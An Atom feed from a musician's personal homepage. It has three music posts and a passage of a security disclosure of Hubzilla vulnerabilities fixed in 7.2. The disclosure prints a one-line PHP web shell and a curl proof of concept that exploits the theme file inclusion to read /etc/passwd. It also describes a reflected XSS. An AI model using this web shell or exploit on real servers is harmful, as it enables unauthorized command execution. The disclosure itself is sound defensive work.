<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
    <title>Haralds Homepage</title>
    <subtitle>  The personal homepage of Harald Eilertsen.
</subtitle>
    <link rel="self" type="application/atom+xml" href="https://volse.net/~haraldei/atom.xml"/>
    <link rel="alternate" type="text/html" href="https://volse.net/~haraldei"/>
    <generator uri="https://www.getzola.org/">Zola</generator>
    <updated>2025-03-01T00:00:00+00:00</updated>
    <id>https://volse.net/~haraldei/atom.xml</id>
    <entry xml:lang="en">
        <title>Djevelbrygg&#x2F;Hjemmehygg</title>
        <published>2025-03-01T00:00:00+00:00</published>
        <updated>2025-03-01T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://volse.net/~haraldei/music/misc/djevelbrygg-hjemmehygg/"/>
        <id>https://volse.net/~haraldei/music/misc/djevelbrygg-hjemmehygg/</id>
        
        <content type="html" xml:base="https://volse.net/~haraldei/music/misc/djevelbrygg-hjemmehygg/">&lt;p&gt;

        
            
        
            
                
                
    
	
	
	
		
		
	
	
	
	

&lt;figure class=&quot;figure}&quot;&gt;
    
	&lt;img src=&quot;https:&#x2F;&#x2F;volse.net&#x2F;~haraldei&#x2F;processed_images&#x2F;fuzzbass-1.d7991a5d2f0d8372.jpg&quot;
			alt=&quot;POV from a bass player down towards a messy floor with cables and some effect pedals&quot;
			&gt;
    
  
&lt;&#x2F;figure&gt;



        
            
        
            
        
            
                
                
    
	
	
	
		
		
	
	
	
	

&lt;figure class=&quot;figure}&quot;&gt;
    
	&lt;img src=&quot;https:&#x2F;&#x2F;volse.net&#x2F;~haraldei&#x2F;processed_images&#x2F;fuzzbass-2.d765b36cc6531fe0.jpg&quot;
			alt=&quot;Closeup of a RAT distortion pedal with the dials set to grim crunchy bass&quot;
			&gt;
    
  
&lt;&#x2F;figure&gt;
&lt;&#x2F;p&gt;
&lt;p&gt;With a lot of things happening around the ancient Stigma Diabolicum&#x2F;Thorns
demos these days, I brushed most of the dust off from my old RAT distortion
pedal. The same I used on the Thorns Grymyrk demo from 1991.&lt;&#x2F;p&gt;
&lt;p&gt;Haven&#x27;t used it since Hell knows when, but it was a a lot of fun playing with
it again. And wouldn&#x27;t you believe it had this happy little requence of riffs
in it as well!&lt;&#x2F;p&gt;


    
        
        

&lt;figure class=&quot;audio-player&quot;&gt;
  &lt;audio src=&quot;https:&#x2F;&#x2F;volse.net&#x2F;~haraldei&#x2F;music&#x2F;misc&#x2F;djevelbrygg-hjemmehygg&#x2F;djevelbrygg_hjemmehygg_r1_2025-02-26.ogg&quot; controls preload=&quot;none&quot;&gt;
  &lt;&#x2F;audio&gt;
  
&lt;&#x2F;figure&gt;
&lt;p&gt;Recorded straight into the soundcard, no filtering or processing. Drums by
&lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;hydrogen-music.org&#x2F;&quot;&gt;Hydrogen&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>Guest vocals for Misery Path - Darkened Skies</title>
        <published>2025-03-01T00:00:00+00:00</published>
        <updated>2025-03-01T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://volse.net/~haraldei/music/misc/guest-vocals-misery-path/"/>
        <id>https://volse.net/~haraldei/music/misc/guest-vocals-misery-path/</id>
        
        <content type="html" xml:base="https://volse.net/~haraldei/music/misc/guest-vocals-misery-path/">&lt;iframe style=&quot;border: 0; width: 350px; height: 470px;&quot; src=&quot;https:&#x2F;&#x2F;bandcamp.com&#x2F;EmbeddedPlayer&#x2F;album=3486075673&#x2F;size=large&#x2F;bgcol=333333&#x2F;linkcol=4ec5ec&#x2F;tracklist=false&#x2F;track=489254738&#x2F;transparent=true&#x2F;&quot; seamless&gt;&lt;a href=&quot;https:&#x2F;&#x2F;miserypath.bandcamp.com&#x2F;album&#x2F;darkened-skies&quot;&gt;Darkened Skies by Misery Path&lt;&#x2F;a&gt;&lt;&#x2F;iframe&gt;
&lt;p&gt;Last fall I was asked by &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;metalhead.club&#x2F;@MiseryPath&quot;&gt;Misery Path&lt;&#x2F;a&gt; if I wanted to do some guest vocals for
them. To be fair, I had hinted I would love to do some for them, if they wanted
it. So the request wasn&#x27;t entirely out of the blue.&lt;&#x2F;p&gt;
&lt;p&gt;Anyways, I put down some vocals on the track &quot;Our Fate Behold&quot; on their
otherwise excellent album &quot;Darkened Skies&quot;.&lt;&#x2F;p&gt;
&lt;p&gt;Listen to the &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;miserypath.bandcamp.com&#x2F;album&#x2F;darkened-skies&quot;&gt;full album at Bandcamp&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>FediVision</title>
        <published>2024-03-13T00:00:00+00:00</published>
        <updated>2024-03-13T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://volse.net/~haraldei/music/misc/fedivision/"/>
        <id>https://volse.net/~haraldei/music/misc/fedivision/</id>
        
        <content type="html" xml:base="https://volse.net/~haraldei/music/misc/fedivision/">&lt;p&gt;Here&#x27;s the contributions I&#x27;ve submitted to
&lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;fedivision.party&quot;&gt;FediVision&lt;&#x2F;a&gt;, the friendly music event of the
fediverse.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;2023-warm-flesh-cold-heart&quot;&gt;2023 - Warm Flesh, Cold Heart&lt;&#x2F;h2&gt;
&lt;p&gt;Composed, recorded and submitted for &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;fedivision.party&#x2F;&quot;&gt;FediVision
2023&lt;&#x2F;a&gt;. This time as &lt;em&gt;Cult of the Headless Volse&lt;&#x2F;em&gt;. Perhaps a tad
darker than the contribution for 2022? Anyways, I had a lot of fun making it.
The riffs were combined with some old lyric snippets I had lying around, and
the result didn&#x27;t get all to bad, I think.&lt;&#x2F;p&gt;
&lt;audio controls&gt;
&lt;source type=&quot;audio&#x2F;mp3&quot; src=&quot;Fedivision 2023 - Cult of the Headless Volse - Warm Flesh, Cold Heart.mp3&quot;&gt;
&lt;source type=&quot;audio&#x2F;ogg&quot; src=&quot;Fedivision 2023 - Cult of the Headless Volse - Warm Flesh, Cold Heart.ogg&quot;&gt;
&lt;&#x2F;audio&gt;
&lt;p&gt;Download:
&lt;a href=&quot;https:&#x2F;&#x2F;volse.net&#x2F;~haraldei&#x2F;music&#x2F;misc&#x2F;fedivision&#x2F;Cult%20of%20the%20Headless%20Volse%20-%20Fedivision%202023%20-%20Warm%20Flesh,%20Cold%20Heart.mp3&quot;&gt;mp3&lt;&#x2F;a&gt; |
&lt;a href=&quot;https:&#x2F;&#x2F;volse.net&#x2F;~haraldei&#x2F;music&#x2F;misc&#x2F;fedivision&#x2F;Cult%20of%20the%20Headless%20Volse%20-%20Fedivision%202023%20-%20Warm%20Flesh,%20Cold%20Heart.ogg&quot;&gt;Ogg Vorbis&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;License: CC BY-SA 4.0 International.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;2022-venom-in-my-veins&quot;&gt;2022 - Venom in my Veins&lt;&#x2F;h2&gt;
&lt;p&gt;I made this track for the &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;fedivision.party&#x2F;&quot;&gt;FediVision 2022&lt;&#x2F;a&gt;
competition under the moniker &lt;em&gt;The Clan of the Headless Volse&lt;&#x2F;em&gt;. It&#x27;s
a short track that should not be taken too seriously, but is meant to be entertaining and
fun. In many ways a tribute to my earliest inspirations, Venom, Motörhead, etc.&lt;&#x2F;p&gt;
&lt;audio controls&gt;
&lt;source type=&quot;audio&#x2F;mp3&quot; src=&quot;Fedivision 2022 - The Clan of the Headless Volse - Venom in my Veins.mp3&quot;&gt;
&lt;source type=&quot;audio&#x2F;ogg&quot; src=&quot;Fedivision 2022 - The Clan of the Headless Volse - Venom in my Veins.ogg&quot;&gt;
&lt;&#x2F;audio&gt;
&lt;p&gt;Download:
&lt;a href=&quot;https:&#x2F;&#x2F;volse.net&#x2F;~haraldei&#x2F;music&#x2F;misc&#x2F;fedivision&#x2F;Fedivision%202022%20-%20The%20Clan%20of%20the%20Headless%20Volse%20-%20Venom%20in%20my%20Veins.mp3&quot;&gt;mp3&lt;&#x2F;a&gt; |
&lt;a href=&quot;https:&#x2F;&#x2F;volse.net&#x2F;~haraldei&#x2F;music&#x2F;misc&#x2F;fedivision&#x2F;Fedivision%202022%20-%20The%20Clan%20of%20the%20Headless%20Volse%20-%20Venom%20in%20my%20Veins.ogg&quot;&gt;Ogg Vorbis&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;License: CC BY-SA 4.0 International.&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>Hubzilla &lt; 7.2 - Multiple vulnerabilities</title>
        <published>2022-04-12T00:00:00+00:00</published>
        <updated>2022-04-12T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              Unknown
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://volse.net/~haraldei/infosec/disclosures/hubzilla-before-7-2-multiple-vulnerabilities/"/>
        <id>https://volse.net/~haraldei/infosec/disclosures/hubzilla-before-7-2-multiple-vulnerabilities/</id>
        
        <content type="html" xml:base="https://volse.net/~haraldei/infosec/disclosures/hubzilla-before-7-2-multiple-vulnerabilities/">&lt;p&gt;While looking at the source code for &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zotlabs.org&#x2F;page&#x2F;hubzilla&#x2F;hubzilla-project&quot;&gt;Hubzilla&lt;&#x2F;a&gt;, I discovered a few low-hanging
security vulnerabilities. These are a &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;owasp.org&#x2F;www-community&#x2F;vulnerabilities&#x2F;PHP_File_Inclusion&quot;&gt;Local File Inclusion&lt;&#x2F;a&gt; vulnerability in the
standard theme, and two vulnerabilities in the settings modules, a
&lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;owasp.org&#x2F;www-community&#x2F;attacks&#x2F;xss&#x2F;&quot;&gt;Cross-Site scripting&lt;&#x2F;a&gt; (XSS) vulnerability and an &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;brightsec.com&#x2F;blog&#x2F;open-redirect-vulnerabilities&#x2F;&quot;&gt;Open Redirect&lt;&#x2F;a&gt; vulnerability,
both via the &lt;code&gt;rpath&lt;&#x2F;code&gt; URL query parameter.&lt;&#x2F;p&gt;
&lt;p&gt;Fixes for all of these issues were released in version 7.2 on March 29, 2022.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;cve-2022-27257-local-file-inclusion-directory-traversal-in-redbasic-theme-for-hubzilla&quot;&gt;CVE-2022-27257: Local file inclusion&#x2F;Directory traversal in Redbasic theme for Hubzilla&lt;&#x2F;h2&gt;
&lt;p&gt;The RedBasic theme does not validate the &lt;code&gt;$_REQUEST[&#x27;schema&#x27;]&lt;&#x2F;code&gt; argument before
using it in a &lt;code&gt;require_once&lt;&#x2F;code&gt; call, leading to a Local File Inclusion (LFI)
vulnerability. Further it does not check the filename for directory separators
or other special chars, leading to a &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;owasp.org&#x2F;www-community&#x2F;attacks&#x2F;Path_Traversal&quot;&gt;directory traversal&lt;&#x2F;a&gt; vulnerability.&lt;&#x2F;p&gt;
&lt;p&gt;This allows an attacker to directly run PHP code from any known location in the
file system where the web server process has read access. This includes files in
the Hubzilla source three that would otherwise be protected by the default server
configuration that redirects all requests to pass through the Hubzilla routing
logic.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;details&quot;&gt;Details&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;Application: Hubzilla&lt;&#x2F;li&gt;
&lt;li&gt;Component: Redbasic (default&#x2F;builtin theme)&lt;&#x2F;li&gt;
&lt;li&gt;Vulnerable versions: Any version before 7.2&lt;&#x2F;li&gt;
&lt;li&gt;Fixed in version: 7.2&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;classification&quot;&gt;Classification&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;CWE: &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;cwe.mitre.org&#x2F;data&#x2F;definitions&#x2F;20.html&quot;&gt;CWE-20&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;cwe.mitre.org&#x2F;data&#x2F;definitions&#x2F;22.html&quot;&gt;CWE-22&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;CVSS Score: &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.first.org&#x2F;cvss&#x2F;calculator&#x2F;3.1#CVSS:3.1&#x2F;AV:N&#x2F;AC:L&#x2F;PR:N&#x2F;UI:N&#x2F;S:C&#x2F;C:L&#x2F;I:L&#x2F;A:L&quot;&gt;8.3&lt;&#x2F;a&gt; (High)&lt;&#x2F;li&gt;
&lt;li&gt;CVSS Vector: CVSS:3.1&#x2F;AV:N&#x2F;AC:L&#x2F;PR:N&#x2F;UI:N&#x2F;S:C&#x2F;C:L&#x2F;I:L&#x2F;A:L&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;relevant-code&quot;&gt;Relevant code:&lt;&#x2F;h3&gt;
&lt;pre data-linenos data-lang=&quot;php&quot; class=&quot;language-php &quot;&gt;&lt;code class=&quot;language-php&quot; data-lang=&quot;php&quot;&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;if($_REQUEST[&amp;#x27;schema&amp;#x27;]) {
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;        $schema = $_REQUEST[&amp;#x27;schema&amp;#x27;];
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;}
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;5&lt;&#x2F;td&gt;&lt;td&gt;if (($schema) &amp;amp;&amp;amp; ($schema != &amp;#x27;---&amp;#x27;)) {
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;6&lt;&#x2F;td&gt;&lt;td&gt;
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;7&lt;&#x2F;td&gt;&lt;td&gt;        &amp;#x2F;&amp;#x2F; Check it exists, because this setting gets distributed to clones
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;        if(file_exists(&amp;#x27;view&amp;#x2F;theme&amp;#x2F;redbasic&amp;#x2F;schema&amp;#x2F;&amp;#x27; . $schema . &amp;#x27;.php&amp;#x27;)) {
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;9&lt;&#x2F;td&gt;&lt;td&gt;                $schemefile = &amp;#x27;view&amp;#x2F;theme&amp;#x2F;redbasic&amp;#x2F;schema&amp;#x2F;&amp;#x27; . $schema . &amp;#x27;.php&amp;#x27;;
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;                require_once ($schemefile);
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;11&lt;&#x2F;td&gt;&lt;td&gt;        }
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;12&lt;&#x2F;td&gt;&lt;td&gt;
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;13&lt;&#x2F;td&gt;&lt;td&gt;        if(file_exists(&amp;#x27;view&amp;#x2F;theme&amp;#x2F;redbasic&amp;#x2F;schema&amp;#x2F;&amp;#x27; . $schema . &amp;#x27;.css&amp;#x27;)) {
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;14&lt;&#x2F;td&gt;&lt;td&gt;                $schemecss = file_get_contents(&amp;#x27;view&amp;#x2F;theme&amp;#x2F;redbasic&amp;#x2F;schema&amp;#x2F;&amp;#x27; . $schema . &amp;#x27;.css&amp;#x27;);
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;15&lt;&#x2F;td&gt;&lt;td&gt;        }
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;16&lt;&#x2F;td&gt;&lt;td&gt;
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;17&lt;&#x2F;td&gt;&lt;td&gt;}
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;h3 id=&quot;proof-of-concept&quot;&gt;Proof of concept:&lt;&#x2F;h3&gt;
&lt;p&gt;Given a file &lt;code&gt;shell.php&lt;&#x2F;code&gt; somewhere in the server file system:&lt;&#x2F;p&gt;
&lt;pre data-lang=&quot;php&quot; class=&quot;language-php &quot;&gt;&lt;code class=&quot;language-php&quot; data-lang=&quot;php&quot;&gt;&amp;lt;?php system($_REQUEST[&amp;#x27;cmd&amp;#x27;]); ?&amp;gt;
&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Any command can be executed by a remote, unauthenticated attacker, like this:&lt;&#x2F;p&gt;
&lt;pre data-lang=&quot;shell&quot; class=&quot;language-shell &quot;&gt;&lt;code class=&quot;language-shell&quot; data-lang=&quot;shell&quot;&gt;$ curl -s &amp;#x27;https:&amp;#x2F;&amp;#x2F;example.com&amp;#x2F;view&amp;#x2F;theme&amp;#x2F;redbasic&amp;#x2F;php&amp;#x2F;style.pcss?f=&amp;amp;puid=2&amp;amp;schema=..&amp;#x2F;..&amp;#x2F;..&amp;#x2F;..&amp;#x2F;shell&amp;amp;v=7.1.6&amp;amp;cmd=cat%20&amp;#x2F;etc&amp;#x2F;passwd&amp;#x27;|head
root:x:0:0:root:&amp;#x2F;root:&amp;#x2F;bin&amp;#x2F;bash
daemon:x:1:1:daemon:&amp;#x2F;usr&amp;#x2F;sbin:&amp;#x2F;usr&amp;#x2F;sbin&amp;#x2F;nologin
bin:x:2:2:bin:&amp;#x2F;bin:&amp;#x2F;usr&amp;#x2F;sbin&amp;#x2F;nologin
sys:x:3:3:sys:&amp;#x2F;dev:&amp;#x2F;usr&amp;#x2F;sbin&amp;#x2F;nologin
sync:x:4:65534:sync:&amp;#x2F;bin:&amp;#x2F;bin&amp;#x2F;sync
games:x:5:60:games:&amp;#x2F;usr&amp;#x2F;games:&amp;#x2F;usr&amp;#x2F;sbin&amp;#x2F;nologin
man:x:6:12:man:&amp;#x2F;var&amp;#x2F;cache&amp;#x2F;man:&amp;#x2F;usr&amp;#x2F;sbin&amp;#x2F;nologin
lp:x:7:7:lp:&amp;#x2F;var&amp;#x2F;spool&amp;#x2F;lpd:&amp;#x2F;usr&amp;#x2F;sbin&amp;#x2F;nologin
mail:x:8:8:mail:&amp;#x2F;var&amp;#x2F;mail:&amp;#x2F;usr&amp;#x2F;sbin&amp;#x2F;nologin
news:x:9:9:news:&amp;#x2F;var&amp;#x2F;spool&amp;#x2F;news:&amp;#x2F;usr&amp;#x2F;sbin&amp;#x2F;nologin
&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;h3 id=&quot;mitigating-factors&quot;&gt;Mitigating factors&lt;&#x2F;h3&gt;
&lt;p&gt;As Hubzilla will rename uploaded files to a GUID, it&#x27;s not trivially possible
to upload a malicious file to be exploited by this weakness by itself. It
requires another way to upload the malicious file, or by finding an existing
file that is exploitable within or outside of the Hubzilla directory tree.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h2 id=&quot;cve-2022-27258-reflected-cross-site-scripting-in-hubzilla-settings-modules&quot;&gt;CVE-2022-27258: Reflected Cross-Site Scripting in Hubzilla settings modules&lt;&#x2F;h2&gt;
&lt;p&gt;A number of settings modules does not sanitise or escape the &lt;code&gt;rpath&lt;&#x2F;code&gt; query
parameter before outputting it into an html attribute, leading to a reflected
Cross-Site Scripting (XSS) vulnerability.&lt;&#x2F;p&gt;
&lt;p&gt;An attacker could use this to inject arbitrary JavaScript into a victims&#x27; session
by enticing them to click a link.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;details-1&quot;&gt;Details&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;Application: Hubzilla&lt;&#x2F;li&gt;
&lt;li&gt;Component: Settings modules&lt;&#x2F;li&gt;
&lt;li&gt;Vulnerable versions: Any version before 7.2&lt;&#x2F;li&gt;
&lt;li&gt;Fixed in version: 7.2&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;classification-1&quot;&gt;Classification&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;CWE: &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;cwe.mitre.org&#x2F;data&#x2F;definitions&#x2F;79.html&quot;&gt;CWE-79&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;CVSS Score: &lt;a rel=&quot;noopener nofollow noreferrer&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.first.org&#x2F;cvss&#x2F;calculator&#x2F;3.1#CVSS:3.1&#x2F;AV:N&#x2F;AC:L&#x2F;PR:N&#x2F;UI:R&#x2F;S:C&#x2F;C:H&#x2F;I:N&#x2F;A:N&quot;&gt;7.4&lt;&#x2F;a&gt; (High)&lt;&#x2F;li&gt;
&lt;li&gt;CVSS Vector: CVSS:3.1&#x2F;AV:N&#x2F;AC:L&#x2F;PR:N&#x2F;UI:R&#x2F;S:C&#x2F;C:H&#x2F;I:N&#x2F;A:N&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;relevant-code-1&quot;&gt;Relevant code&lt;&#x2F;h3&gt;
&lt;p&gt;Example from &lt;code&gt;Zotlabs&#x2F;Module&#x2F;Settings&#x2F;Calendar.php&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;
&lt;pre data-linenos data-lang=&quot;php&quot; class=&quot;language-php &quot;&gt;&lt;code class=&quot;language-php&quot; data-lang=&quot;php&quot;&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;mark&gt;32&lt;&#x2F;mark&gt;&lt;&#x2F;td&gt;&lt;td&gt;&lt;mark&gt;		$rpath = (($_GET[&amp;#x27;rpath&amp;#x27;]) ? $_GET[&amp;#x27;rpath&amp;#x27;] : &amp;#x27;&amp;#x27;);
&lt;&#x2F;mark&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;33&lt;&#x2F;td&gt;&lt;td&gt;
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;34&lt;&#x2F;td&gt;&lt;td&gt;		$tpl = get_markup_template(&amp;quot;settings_module.tpl&amp;quot;);
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;35&lt;&#x2F;td&gt;&lt;td&gt;
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;36&lt;&#x2F;td&gt;&lt;td&gt;		$o .= replace_macros($tpl, array(
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;&lt;mark&gt;37&lt;&#x2F;mark&gt;&lt;&#x2F;td&gt;&lt;td&gt;&lt;mark&gt;			&amp;#x27;$rpath&amp;#x27; =&amp;gt; $rpath,
&lt;&#x2F;mark&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;38&lt;&#x2F;td&gt;&lt;td&gt;			&amp;#x27;$action_url&amp;#x27; =&amp;gt; &amp;#x27;settings&amp;#x2F;&amp;#x27; . $module,
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;39&lt;&#x2F;td&gt;&lt;td&gt;			&amp;#x27;$form_security_token&amp;#x27; =&amp;gt; get_form_security_token(&amp;#x27;settings_&amp;#x27; . $module),
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;40&lt;&#x2F;td&gt;&lt;td&gt;			&amp;#x27;$title&amp;#x27; =&amp;gt; t(&amp;#x27;Calendar Settings&amp;#x27;),
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;41&lt;&#x2F;td&gt;&lt;td&gt;			&amp;#x27;$features&amp;#x27;  =&amp;gt; process_module_features_get(local_channel(), $features),
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;42&lt;&#x2F;td&gt;&lt;td&gt;			&amp;#x27;$submit&amp;#x27;    =&amp;gt; t(&amp;#x27;Submit&amp;#x27;)
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;43&lt;&#x2F;td&gt;&lt;td&gt;		));
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The highlighted lines show how the query parameter &lt;code&gt;rpath&lt;&#x2F;code&gt; is passed directly
to the template &lt;code&gt;settings_module.tpl&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;
&lt;pre data-linenos data-lang=&quot;tpl&quot; class=&quot;language-tpl &quot;&gt;&lt;code class=&quot;language-tpl&quot; data-lang=&quot;tpl&quot;&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;		{{if $rpath}}
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;&lt;mark&gt;9&lt;&#x2F;mark&gt;&lt;&#x2F;td&gt;&lt;td&gt;&lt;mark&gt;		&amp;lt;input type=&amp;#x27;hidden&amp;#x27; name=&amp;#x27;rpath&amp;#x27; value=&amp;#x27;{{$rpath}}&amp;#x27;&amp;gt;
&lt;&#x2F;mark&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;tr&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;		{{&amp;#x2F;if}}
&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Where it is used without further escaping in a html element attribute.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;related-source-files&quot;&gt;Related source files:&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Zotlabs&#x2F;Module&#x2F;Settings&#x2F;Calendar.php&lt;&#x2F;code&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;Zotlabs&#x2F;Module&#x2F;Settings&#x2F;Channel_home.php&lt;&#x2F;code&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;Zotlabs&#x2F;Module&#x2F;Settings&#x2F;Connections.php&lt;&#x2F;code&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;Zotlabs&#x2F;Module&#x2F;Settings&#x2F;Directory.php&lt;&#x2F;code&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;Zotlabs&#x2F;Module&#x2F;Settings&#x2F;Editor.php&lt;&#x2F;code&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;Zotlabs&#x2F;Module&#x2F;Settings&#x2F;Events.php&lt;&#x2F;code&gt;&lt;&#x2F;li&gt;
